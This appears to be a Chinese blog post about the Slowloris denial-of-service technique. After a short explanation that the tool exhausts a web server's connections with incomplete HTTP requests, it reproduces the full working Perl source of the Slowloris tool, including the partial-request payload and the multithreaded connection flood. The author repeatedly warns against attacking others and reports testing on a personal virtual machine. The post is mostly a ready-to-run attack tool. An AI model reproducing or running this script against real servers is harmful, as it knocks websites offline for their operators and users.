请勿用此工具攻击别人,谢谢。
他的原理简单的来说是对HTTP服务器送不出完全的HTTP请求,并且试着让它保持不被HTTP服务器超时,如此一来HTTP服务器可开启的最大socket就会满了,最后导致的HTTP服务器无法提供服务。
与传统的DoS攻击不同的地方在于只用单一的服务器加上少许的带宽就可以瘫痪HTTP服务器。
- #!/usr/bin/perl -w
- use strict;
- use IO::Socket::INET;
- use IO::Socket::SSL;
- use Getopt::Long;
- use Config;
- $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
- print <<EOTEXT;
- CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
- CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
- CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
- CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
- CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
- ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
- ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
- oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
- oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
- oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
- CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
- CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
- OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
- OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
- COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
- CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
- coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
- :ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
- .:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
- ....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
- .......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
- ...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
- .............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
- ..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
- . . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
- . .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
- . . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
- Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
- EOTEXT
- my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
- my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
- my $result = GetOptions(
- 'shost=s' => \$shost,
- 'dns=s' => \$host,
- 'httpready' => \$httpready,
- 'num=i' => \$connections,
- 'cache' => \$cache,
- 'port=i' => \$port,
- 'https' => \$ssl,
- 'tcpto=i' => \$tcpto,
- 'test' => \$test,
- 'timeout=i' => \$timeout,
- 'version' => \$version,
- );
- if ($version) {
- print "Version 0.7\n";
- exit;
- }
- unless ($host) {
- print "Usage:\n\n\tperl $0 -dns [] -options\n";
- print "\n\tType 'perldoc $0' for help with options.\n\n";
- exit;
- }
- unless ($port) {
- $port = 80;
- print "Defaulting to port 80.\n";
- }
- unless ($tcpto) {
- $tcpto = 5;
- print "Defaulting to a 5 second tcp connection timeout.\n";
- }
- unless ($test) {
- unless ($timeout) {
- $timeout = 100;
- print "Defaulting to a 100 second re-try timeout.\n";
- }
- unless ($connections) {
- $connections = 1000;
- print "Defaulting to 1000 connections.\n";
- }
- }
- my $usemultithreading = 0;
- if ( $Config{usethreads} ) {
- print "Multithreading enabled.\n";
- $usemultithreading = 1;
- use threads;
- use threads::shared;
- }
- else {
- print "No multithreading capabilites found!\n";
- print "Slowloris will be slower than normal as a result.\n";
- }
- my $packetcount : shared = 0;
- my $failed : shared = 0;
- my $connectioncount : shared = 0;
- srand() if ($cache);
- if ($shost) {
- $sendhost = $shost;
- }
- else {
- $sendhost = $host;
- }
- if ($httpready) {
- $method = "POST";
- }
- else {
- $method = "GET";
- }
- if ($test) {
- my @times = ( "2", "30", "90", "240", "500" );
- my $totaltime = 0;
- foreach (@times) {
- $totaltime = $totaltime + $_;
- }
- $totaltime = $totaltime / 60;
- print "This test could take up to $totaltime minutes.\n";
- my $delay = 0;
- my $working = 0;
- my $sock;
- if ($ssl) {
- if (
- $sock = new IO::Socket::SSL(
- PeerAddr => "$host",
- PeerPort => "$port",
- Timeout => "$tcpto",
- Proto => "tcp",
- )
- )
- {
- $working = 1;
- }
- }
- else {
- if (
- $sock = new IO::Socket::INET(
- PeerAddr => "$host",
- PeerPort => "$port",
- Timeout => "$tcpto",
- Proto => "tcp",
- )
- )
- {
- $working = 1;
- }
- }
- if ($working) {
- if ($cache) {
- $rand = "?" . int( rand(99999999999999) );
- }
- else {
- $rand = "";
- }
- my $primarypayload =
- "GET /$rand HTTP/1.1\r\n"
- . "Host: $sendhost\r\n"
- . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
- . "Content-Length: 42\r\n";
- if ( print $sock $primarypayload ) {
- print "Connection successful, now comes the waiting game...\n";
- }
- else {
- print
- "That's odd - I connected but couldn't send the data to $host:$port.\n";
- print "Is something wrong?\nDying.\n";
- exit;
- }
- }
- else {
- print "Uhm... I can't connect to $host:$port.\n";
- print "Is something wrong?\nDying.\n";
- exit;
- }
- for ( my $i = 0 ; $i <= $#times ; $i++ ) {
- print "Trying a $times[$i] second delay: \n";
- sleep( $times[$i] );
- if ( print $sock "X-a: b\r\n" ) {
- print "\tWorked.\n";
- $delay = $times[$i];
- }
- else {
- if ( $SIG{__WARN__} ) {
- $delay = $times[ $i - 1 ];
- last;
- }
- print "\tFailed after $times[$i] seconds.\n";
- }
- }
- if ( print $sock "Connection: Close\r\n\r\n" ) {
- print "Okay that's enough time. Slowloris closed the socket.\n";
- print "Use $delay seconds for -timeout.\n";
- exit;
- }
- else {
- print "Remote server closed socket.\n";
- print "Use $delay seconds for -timeout.\n";
- exit;
- }
- if ( $delay < 166 ) {
- print <<EOSUCKS2BU;
- Since the timeout ended up being so small ($delay seconds) and it generally
- takes between 200-500 threads for most servers and assuming any latency at
- all... you might have trouble using Slowloris against this target. You can
- tweak the -timeout flag down to less than 10 seconds but it still may not
- build the sockets in time.
- EOSUCKS2BU
- }
- }
- else {
- print
- "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
- if ($usemultithreading) {
- domultithreading($connections);
- }
- else {
- doconnections( $connections, $usemultithreading );
- }
- }
- sub doconnections {
- my ( $num, $usemultithreading ) = @_;
- my ( @first, @sock, @working );
- my $failedconnections = 0;
- $working[$_] = 0 foreach ( 1 .. $num ); #initializing
- $first[$_] = 0 foreach ( 1 .. $num ); #initializing
- while (1) {
- $failedconnections = 0;
- print "\t\tBuilding sockets.\n";
- foreach my $z ( 1 .. $num ) {
- if ( $working[$z] == 0 ) {
- if ($ssl) {
- if (
- $sock[$z] = new IO::Socket::SSL(
- PeerAddr => "$host",
- PeerPort => "$port",
- Timeout => "$tcpto",
- Proto => "tcp",
- )
- )
- {
- $working[$z] = 1;
- }
- else {
- $working[$z] = 0;
- }
- }
- else {
- if (
- $sock[$z] = new IO::Socket::INET(
- PeerAddr => "$host",
- PeerPort => "$port",
- Timeout => "$tcpto",
- Proto => "tcp",
- )
- )
- {
- $working[$z] = 1;
- $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
- }
- else {
- $working[$z] = 0;
- }
- }
- if ( $working[$z] == 1 ) {
- if ($cache) {
- $rand = "?" . int( rand(99999999999999) );
- }
- else {
- $rand = "";
- }
- my $primarypayload =
- "$method /$rand HTTP/1.1\r\n"
- . "Host: $sendhost\r\n"
- . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
- . "Content-Length: 42\r\n";
- my $handle = $sock[$z];
- if ($handle) {
- print $handle "$primarypayload";
- if ( $SIG{__WARN__} ) {
- $working[$z] = 0;
- close $handle;
- $failed++;
- $failedconnections++;
- }
- else {
- $packetcount++;
- $working[$z] = 1;
- }
- }
- else {
- $working[$z] = 0;
- $failed++;
- $failedconnections++;
- }
- }
- else {
- $working[$z] = 0;
- $failed++;
- $failedconnections++;
- }
- }
- }
- print "\t\tSending data.\n";
- foreach my $z ( 1 .. $num ) {
- if ( $working[$z] == 1 ) {
- if ( $sock[$z] ) {
- my $handle = $sock[$z];
- if ( print $handle "X-a: b\r\n" ) {
- $working[$z] = 1;
- $packetcount++;
- }
- else {
- $working[$z] = 0;
- #debugging info
- $failed++;
- $failedconnections++;
- }
- }
- else {
- $working[$z] = 0;
- #debugging info
- $failed++;
- $failedconnections++;
- }
- }
- }
- print
- "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
- sleep($timeout);
- }
- }
- sub domultithreading {
- my ($num) = @_;
- my @thrs;
- my $i = 0;
- my $connectionsperthread = 50;
- while ( $i < $num ) {
- $thrs[$i] =
- threads->create( \&doconnections, $connectionsperthread, 1 );
- $i += $connectionsperthread;
- }
- my @threadslist = threads->list();
- while ( $#threadslist > 0 ) {
- $failed = 0;
- }
- }
以下是在我的虚机测试,再次强调,请勿用于攻击他人的服务器。
正常的页面看起来像这样。
被slowloris攻击时就无法连上。
阅读(6678) | 评论(2) | 转发(0) |